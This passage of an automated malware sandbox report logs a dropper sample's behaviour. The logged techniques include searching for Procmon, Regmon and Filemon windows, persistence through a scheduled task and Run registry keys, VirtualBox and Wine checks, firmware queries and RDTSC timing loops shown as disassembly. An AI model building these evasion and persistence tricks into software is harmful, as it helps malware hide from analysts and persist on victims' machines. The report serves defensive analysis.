Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d015c0e328.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d015c0e328.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9b8665be8a.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9b8665be8a.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 36321ea525.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 36321ea525.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da69a13142.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da69a13142.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D569 second address: C0D571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D7F0 second address: C0D7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0D7FB second address: C0D7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DAD0 second address: C0DAD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DAD6 second address: C0DADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DC6A second address: C0DC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DC70 second address: C0DC78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0DC78 second address: C0DC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F7A4900AE66h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C118E7 second address: C118FA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F7A49940176h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C118FA second address: C11923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F7A4900AE6Ch 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F7A4900AE6Bh 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C119D5 second address: C11A21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F7A49940185h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 688725F3h 0x00000012 or edi, 36304D82h 0x00000018 push 00000003h 0x0000001a mov dx, 7200h 0x0000001e push 00000000h 0x00000020 mov esi, 5B0D83EAh 0x00000025 push 00000003h 0x00000027 mov dword ptr [ebp+122D26F2h], esi 0x0000002d push D76DE7C9h 0x00000032 push ecx 0x00000033 pushad 0x00000034 jno 00007F7A49940176h 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11A21 second address: C11A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 xor dword ptr [esp], 176DE7C9h 0x0000000d lea ebx, dword ptr [ebp+124667D9h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F7A4900AE68h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d or edi, dword ptr [ebp+122D2900h] 0x00000033 jmp 00007F7A4900AE78h 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11A7C second address: C11A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11A81 second address: C11A9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7A4900AE6Ch 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11DB7 second address: C11E04 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7A49940176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F7A49940184h 0x0000000f popad 0x00000010 push eax 0x00000011 jnc 00007F7A4994018Fh 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007F7A49940178h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11E04 second address: C11E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7A4900AE6Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ebx 0x00000010 jl 00007F7A4900AE6Ch 0x00000016 jno 00007F7A4900AE66h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push edi 0x00000022 jmp 00007F7A4900AE73h 0x00000027 pop edi 0x00000028 pop eax 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F7A4900AE68h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Bh 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 adc di, 8355h 0x00000048 lea ebx, dword ptr [ebp+124667EDh] 0x0000004e jmp 00007F7A4900AE78h 0x00000053 mov di, EC16h 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jnc 00007F7A4900AE66h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11E95 second address: C11E9B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C22805 second address: C22820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007F7A4900AE66h 0x00000014 jnc 00007F7A4900AE66h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1537 second address: BF153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF153B second address: BF1543 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BF1543 second address: BF1557 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7A4994017Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3090C second address: C30910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
